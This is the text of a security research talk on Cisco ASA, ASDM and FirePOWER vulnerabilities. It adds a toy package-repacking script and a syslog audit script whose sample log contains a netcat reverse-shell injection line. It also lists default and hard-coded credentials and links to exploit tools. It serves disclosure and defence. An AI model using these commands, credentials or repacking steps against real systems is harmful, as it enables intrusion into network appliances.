Do Not Trust the ASA, Trojans!

Jacob Baines
Lead Security Researcher, Rapid7
August 11, 2022
Introduction

Adaptive Security Appliance (ASA)

Hardware generations pictured: Original ASA; ASA-X; ASA-X with FirePOWER Services.
ASA Virtual Appliance (ASAv)

(Source: ASAv Product Landing Page)

Sort of ASA

Other platforms that run ASA software: Firepower 1000, 2100, 4100 and 9300 Series; Secure Firewall 3100 Series; Secure Firewall ISA3000; ASA Service Module.

(Source: ASA Software Landing Page)

Adaptive Security Appliance (ASA)

Do Not Trust the ASA

Adaptive Security Device Manager (ASDM)

(Source: ASDM Product Landing Page)
Understanding ASDM

Starting ASDM Client Overview

1. The ASDM client requests pdm.sgz from the ASA.
2. The ASA returns pdm.sgz.
3. The client loads and executes the SGZ contents.
4. An admin session is established.
Exploiting ASDM

ASDM Client Does Not Verify the Server Cert

ASDM/ASA Man in the Middle

Man in the Middle with mitmproxy
What’s in the SGZ?

Contents of the 7.18.1 SGZ:
- 13472 class files
- 6 jars
- 1 prop file
- 4 properties files
- 3 txt files
- 1 SIGNATURE file

Extraction tool: github.com/jbaines-r7/getchoo

SGZ Client Logic Isn’t Verified (CVE-2021-1585)

(Source: Cisco ASDM RCE Vulnerability (CVE-2021-1585))
CVE-2021-1585 Exploited via Evil Endpoint

1. The administrator connects to the attacker using the ASDM client.
2. The attacker responds with a malicious SGZ file.
3. A reverse shell is established from the administrator to the attacker.

CVE-2021-1585 Exploits

Exploitation
- Missing SSL verification (no CVE) plus SGZ code not verified (CVE-2021-1585)
- Evil endpoint or Man in the Middle

CVE-2021-1585
- Disclosed in July 2021 with no patch
- Failed patch in June 2022
- Remains unpatched as of July 2022

Public Exploits
- staystaystay: github.com/jbaines-r7/staystaystay
- Metasploit module: github.com/jbaines-r7/cisco_asa_research/tree/main/modules/cve_2021_1585
Crafting a Malicious ASDM Package

Hacker Cat Can’t Get Inside Corpnet

Unless… We Modify the SGZ on the ASA!

How Does the SGZ Get On the ASA?
ASDM Binary Package Format

- Header: Magic, Description, File length, Hash
- Manifest: one entry per file, each with Filename, Data offset, Data length
- Files: Raw Data

Is this a Security Feature?

Nope, Just an MD5 Hash

The Hash field in the header is a plain MD5 digest of the package: an integrity check, not a signature. Anyone who can rewrite the package contents can recompute it.
Missing ASDM Package Verification (CVE-2022-20829)
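The point of the last three slides, as an added example that is not code from the talk, from Rapid7, or from the author's tool theway (which parses and rebuilds the real format): a toy package using the header and manifest fields the slides name (Magic, Description, File length, Hash; per-file Filename, Data offset, Data length; raw data). The byte widths, field order and the span the MD5 covers are assumptions made for illustration, not the real Cisco layout. It shows that a package whose pdm.sgz has been replaced passes the embedded-hash check exactly as the genuine one does, and goes one step past the slide by showing the check that does catch a repack: a comparison against a digest obtained out of band, which the ASA cannot perform for an arbitrary uploaded package.

```python
"""Toy model of an ASDM-style binary package whose only "protection" is an
embedded MD5 hash.  Field names follow the slide (Magic, Description,
File length, Hash, then a manifest of Filename/Data offset/Data length, then raw
data); the byte widths, ordering and what the hash covers are assumptions made
for this example, not the real Cisco layout."""
import hashlib
import struct

MAGIC = b"ASDMPKG\x00"          # assumed 8-byte magic
DESC_LEN = 64                   # assumed fixed-width description
NAME_LEN = 64                   # assumed fixed-width filename
HEADER_FMT = ">8s64sI16s"       # magic, description, file length, MD5 digest
ENTRY_FMT = ">64sII"            # filename, data offset, data length
HEADER_LEN = struct.calcsize(HEADER_FMT)
ENTRY_LEN = struct.calcsize(ENTRY_FMT)


def _pad(s: bytes, n: int) -> bytes:
    if len(s) > n:
        raise ValueError("field too long")
    return s.ljust(n, b"\x00")


def build_package(description: str, files: dict) -> bytes:
    """Serialise files into a package and stamp it with MD5(manifest + data)."""
    names = sorted(files)
    manifest = struct.pack(">I", len(names))
    data = b""
    data_start = HEADER_LEN + 4 + ENTRY_LEN * len(names)
    for name in names:
        content = files[name]
        manifest += struct.pack(ENTRY_FMT, _pad(name.encode(), NAME_LEN),
                                data_start + len(data), len(content))
        data += content
    body = manifest + data
    digest = hashlib.md5(body).digest()
    header = struct.pack(HEADER_FMT, MAGIC, _pad(description.encode(), DESC_LEN),
                         HEADER_LEN + len(body), digest)
    return header + body


def parse_package(blob: bytes):
    """Return (description, {filename: content}, stored_md5, computed_md5)."""
    magic, desc, length, stored = struct.unpack_from(HEADER_FMT, blob, 0)
    if magic != MAGIC or length != len(blob):
        raise ValueError("bad magic or length")
    body = blob[HEADER_LEN:]
    (count,) = struct.unpack_from(">I", blob, HEADER_LEN)
    files = {}
    pos = HEADER_LEN + 4
    for _ in range(count):
        name, off, ln = struct.unpack_from(ENTRY_FMT, blob, pos)
        pos += ENTRY_LEN
        if off + ln > len(blob):
            raise ValueError("entry points outside package")
        files[name.rstrip(b"\x00").decode()] = blob[off:off + ln]
    return desc.rstrip(b"\x00").decode(), files, stored, hashlib.md5(body).digest()


def integrity_check_passes(blob: bytes) -> bool:
    """All an embedded hash can tell you: the bytes match the digest stored
    next to them.  Whoever can write the bytes can write the digest."""
    _, _, stored, computed = parse_package(blob)
    return stored == computed


def trojanize(blob: bytes, filename: str, payload: bytes) -> bytes:
    """Swap one file (e.g. pdm.sgz) and rebuild; the MD5 is recomputed on the
    way out, so the package stays self-consistent."""
    desc, files, _, _ = parse_package(blob)
    files[filename] = payload
    return build_package(desc, files)


def matches_published_digest(blob: bytes, expected_md5_hex: str) -> bool:
    """The check that does catch a repack: compare the whole file against a
    digest obtained out of band (e.g. the vendor download page).  The ASA
    cannot do this for an arbitrary package an administrator uploads."""
    return hashlib.md5(blob).hexdigest() == expected_md5_hex


def demo() -> dict:
    # Constructed sample; a real package holds the 19 files listed on the next slide.
    genuine = build_package("ASDM 7.18.1", {
        "pdm.sgz": b"\x1f\x8b genuine client code",
        "version.prop": b"asdm.version=7.18.1\n",
    })
    published = hashlib.md5(genuine).hexdigest()   # stands in for the vendor checksum
    evil = trojanize(genuine, "pdm.sgz", b"\x1f\x8b reverse shell here")
    return {
        "genuine_self_check": integrity_check_passes(genuine),
        "evil_self_check": integrity_check_passes(evil),
        "genuine_published": matches_published_digest(genuine, published),
        "evil_published": matches_published_digest(evil, published),
        "evil_pdm": parse_package(evil)[1]["pdm.sgz"],
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

Both the genuine and the trojanized package report a valid self-check; only the out-of-band comparison distinguishes them. That is the gap CVE-2022-20829 names: nothing on the appliance ties the package to Cisco.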
ASA Will Host Any ASDM Package
ASDM Binary Package Contents

1. asdm50-install.msi
2. asdmversion.html
3. dm-launcher.dmg
4. dm-launcher.msi
5. pdm.sgz
6. pdmversion.html
7. public/asa-pix.gif
8. public/asdm.jnlp
9. public/asdm32.gif
10. public/cert.jnlp
11. public/cisco.gif
12. public/deployJava.js
13. public/dm-launcher.jar
14. public/index.html
15. public/jploader.jar
16. public/lzma.jar
17. public/retroweaver-rt-2.0.jar
18. public/startup.jnlp
19. version.prop

ASDM Binary Package Contains pdm.sgz
Extracting Cisco ASDM Binary Packages

Building Cisco ASDM Binary Packages

Generating Malicious ASDM Binary Packages

The Way (github.com/jbaines-r7/theway)
- Parses and extracts ASDM packages
- Rebuilds ASDM packages
- Generates ASDM packages

CVE-2022-20829
- Disclosed to Cisco in February 2022
- ASA Software fix planned for August 2022

Malicious Cisco ASA

How To Get Malicious ASDM Package Installed?!

???

Supply Chain
Remotely Rooting the ASA-X FirePOWER Module

ASA-X with FirePOWER Services

ASA-X with FirePOWER Services Explained

(Source: Recreation of Image Published by Cisco)
Accessing the FirePOWER Module via Cisco CLI

Screenshot annotations:
- The command that invokes the FirePOWER shell from the ASA CLI
- The FirePOWER shell requires a separate set of credentials (default admin:Admin123)
- The FirePOWER module shell
expert Command Yields Root Shell

SSH Root Shell as a Feature

An Attacker’s Dream

Disable Root Shell via lockdown-sensor

ASDM Can Talk to the FirePOWER Module

ASDM Cannot Access the Root Shell

session sfr do `shell command`

Tweetable Reverse Shell

session sfr do `ghost in the shell`
CVE-2022-20828: Authenticated RCE

ASDM Uses HTTP Basic Auth by Default

Default Creds are <blank>:<blank>

(Source: "ASDM Book 1" by Cisco)
ASDM Logs Credentials to File

ASDM Client Credential Logging
- Assigned CVE-2022-20651
- We developed a Metasploit module that hunts out the leaked credentials

github.com/jbaines-r7/cisco_asa_research/tree/main/modules/cve_2022_20651

HTTP Brute-Force Protection Disabled by Default

Metasploit ASDM Brute-Force Module

ASDM HTTP Brute-Force
- Generic HTTP brute-force won’t work due to user agent requirements.
- Previous ASA brute-force modules hit the clientless VPN interface.
- ASDM credentials can give privileged access and aid in network pivoting!
- No shame in brute-force attacks. If it’s good enough for GRU, it’s good enough for you.

github.com/jbaines-r7/cisco_asa_research/tree/main/modules/asdm_bruteforce
CVE-2022-20828 Metasploit Module

Exploitation
- Authenticated command injection over HTTP or SSH to establish a root shell within the FirePOWER module VM.

CVE-2022-20828
- Disclosed to vendor in March 2022
- Some versions patched in June 2022
- All patched by December 2022

github.com/jbaines-r7/cisco_asa_research/tree/main/modules/cve_2022_20828
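The defender's side of the last three slides (HTTP brute force with no lockout, blank default credentials, and `session sfr do` command injection), as an added example that is not code from the talk or from Rapid7: an audit script run over ASA syslog that counts denied HTTP logins per source, flags successful logins with an empty username, and flags `session sfr do` commands whose argument carries shell metacharacters. The sample lines are constructed; their shape is modelled on ASA message IDs 605004/605005 (login denied/permitted) and 111010 (command executed) as an assumption, so check the regexes against what your own appliance emits for HTTP logins and privileged commands before relying on them.

```python
"""Audit ASA syslog for the two ASDM-side abuses the talk pairs together:
HTTP credential brute force (no lockout by default) and `session sfr do`
command injection (CVE-2022-20828).  Example code written for this page, not
Rapid7's or Cisco's.  Sample lines are constructed; their shape is modelled on
ASA message IDs 605004/605005 (login denied/permitted) and 111010 (command
executed) as an assumption.  Adjust the regexes to your appliance's output."""
import re
from collections import Counter

LOGIN_RE = re.compile(
    r"%ASA-\d-60500(?P<code>[45]): Login (?P<verdict>permitted|denied) from "
    r"(?P<src>[\d.]+)/\d+ to \S+ for user \"(?P<user>[^\"]*)\""
)
CMD_RE = re.compile(
    r"%ASA-\d-111010: User '(?P<user>[^']*)', running '(?P<app>[^']*)' from IP "
    r"(?P<src>[\d.]+), executed '(?P<cmd>.*)'$"
)
# Metacharacters that turn a `session sfr do <cmd>` argument into shell code.
SHELL_META = ("`", "$(", ";", "|", "&&", ">")


def parse_event(line: str):
    """Return a dict for login or command events, None for anything else."""
    m = LOGIN_RE.search(line)
    if m:
        return {"type": "login", "src": m["src"], "user": m["user"],
                "ok": m["verdict"] == "permitted"}
    m = CMD_RE.search(line)
    if m:
        return {"type": "cmd", "src": m["src"], "user": m["user"],
                "app": m["app"], "cmd": m["cmd"]}
    return None


def brute_force_sources(events, threshold=10):
    """Sources with at least `threshold` denied logins: the pattern the ASDM
    HTTP endpoint permits when no local lockout is configured."""
    denied = Counter(e["src"] for e in events
                     if e["type"] == "login" and not e["ok"])
    return {src: n for src, n in denied.items() if n >= threshold}


def blank_user_logins(events):
    """Successful logins with an empty username (the <blank>:<blank> default)."""
    return [e for e in events
            if e["type"] == "login" and e["ok"] and e["user"] == ""]


def injected_sfr_commands(events):
    """`session sfr do` invocations carrying shell metacharacters.  A plain
    `session sfr do <command>` is legitimate; a backtick or $( ) in the
    argument is what CVE-2022-20828 uses to run as root in the module VM."""
    hits = []
    for e in events:
        if e["type"] != "cmd":
            continue
        cmd = e["cmd"]
        if cmd.startswith("session sfr do") and any(t in cmd for t in SHELL_META):
            hits.append(e)
    return hits


def audit(log_text: str, threshold=10) -> dict:
    events = [ev for ev in map(parse_event, log_text.splitlines()) if ev]
    return {
        "brute_force": brute_force_sources(events, threshold),
        "blank_user": blank_user_logins(events),
        "sfr_injection": injected_sfr_commands(events),
    }


# Constructed sample log (not real appliance output).
SAMPLE_LOG = "\n".join(
    [f'%ASA-6-605004: Login denied from 203.0.113.5/{40000 + i} to outside:198.51.100.1/https for user "admin"'
     for i in range(12)]
    + [
        '%ASA-6-605005: Login permitted from 10.9.8.7/51234 to mgmt:10.0.0.1/https for user ""',
        "%ASA-5-111010: User 'admin', running 'ASDM' from IP 10.9.8.7, executed 'session sfr do show version'",
        "%ASA-5-111010: User 'admin', running 'ASDM' from IP 10.9.8.7, executed 'session sfr do `nc 10.9.8.7 4444 -e /bin/sh`'",
        "%ASA-5-111010: User 'netops', running 'CLI' from IP 10.0.0.5, executed 'configure terminal'",
    ]
)

if __name__ == "__main__":
    for key, value in audit(SAMPLE_LOG).items():
        print(key, value)
```

The brute-force threshold is a tuning knob, not a rule: with lockout disabled an attacker can pace attempts, so also watch for the ASDM user agent appearing from addresses that never run the client.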
Getting Root With an ASA-X FirePOWER Boot Image

FirePOWER Module Not Installed, What Do?

Get a Root Shell Using a FirePOWER Boot Image

FirePOWER Module Installation

(Source: ASA 5506-X with FirePOWER Services 6.2.3 Software Download)

Install the FirePOWER Boot Image via Cisco CLI

(Source: Install and Configure a FirePOWER Services Module on an ASA Platform)

Drop to the FirePOWER Boot Image Shell

(Source: Install and Configure a FirePOWER Services Module on an ASA Platform)

FirePOWER Boot Image Shell

Boot Image Root Shell via Hard-Coded Creds

Hard-coded credential: cisco123

We’re Back!
Metasploit FirePOWER Boot Image Root Shell Module

Exploitation
- Exploits the hard-coded credential to establish a root shell on an ASA-X with FirePOWER Services.

Not a vulnerability
- Disclosed to vendor in March 2022
- Vendor states this is not a vulnerability
- Fixed in Boot Image 7.0+
- Unpatchable? No mechanism to stop loading of old boot images.

Exploits
- Python script: github.com/jbaines-r7/slowcheetah
- SSH Metasploit module: github.com/jbaines-r7/cisco_asa_research/tree/main/modules/boot_image_shell
Distributable Malicious FirePOWER Boot Image for ASA-X

Hacker Cat Has No Access!

FirePOWER Boot Image Is… A Generic Bootable Linux ISO

Distribute a Malicious ISO / Boot Image?
Pinch Me: Malicious Boot Image Creator

Exploitation
- Create a Tiny Core Linux bootable ISO
- Get an administrator to install it
- Sends a reverse shell to the configured IP:port

Not a vulnerability
- No security expectations for the boot image.
- Doesn’t persist through reboots.

Features
- Reverse shell
- SSH
- DOOM-ASCII

github.com/jbaines-r7/pinchme

Profit
Distributable Malicious FirePOWER Install Package for ASA-X

ASA-X FirePOWER Module Install Package

FirePOWER Boot Image Supports Signed Install Packages

FirePOWER Module Signed Install Package

FirePOWER Boot Image Supports Unsigned Install Packages

Distribute a Malicious Install Package?

FirePOWER Module Unsigned Install Package

Convert a Secure Package to an Insecure Package
Create Malicious Install Packages

Exploitation
- Input: a valid, signed, Cisco-created package. Output: a valid unsigned package containing malicious code.
- Persistent payload. Survives reboots and upgrades.

Not a vulnerability
- No security expectations on installation.

github.com/jbaines-r7/whatsup

Back Again!

…Not a Supply Chain Issue?
Exploitation Summary

Do Not Trust the ASA?

This Talk Discussed
- Man in the middle problems
- Credential leaks
- Code signing issues
- Package signing issues
- Root shell as a feature
- Hard-coded credentials for a root shell
- Remote command injection for root access
- Executing arbitrary bootable ISOs

Indicators and Mitigations

Not This. Never This.
YARA Rules

New YARA Rules
- Detect malicious ASDM packages
- Detect execution of malicious SGZ
- Detect credentials in ASDM log files
- Detect unsigned FirePOWER install packages

github.com/jbaines-r7/cisco_asa_research/blob/main/yara/
Apply ASA and ASDM Patches?

● Eventually?
  ○ No patches planned for ASA-X with FirePOWER Services boot images or installation packages
  ○ CVE-2021-1585 still unpatched
  ○ CVE-2022-20829 still unpatched (maybe?)
  ○ CVE-2022-20828 patches planned through December 2022
● What to do when patches aren’t available?
  ○ Mitigating controls: limit access and isolate
  ○ If possible, remove from the network critical path
  ○ Rotate passwords
● What to do about the ASA-X with FirePOWER Services?
  ○ Multiple distributable root shell vectors
  ○ Virtual machine root shell is a default feature
  ○ If possible, accelerate retirement and replace
  ○ Audit the virtual machine root shell regularly
  ○ Audit Cisco CLI / ASDM logins regularly
Thank you!

Slides & Code: https://github.com/jbaines-r7/cisco_asa_research

@jbaines-r7 @Junior_Baines @jbaines-r7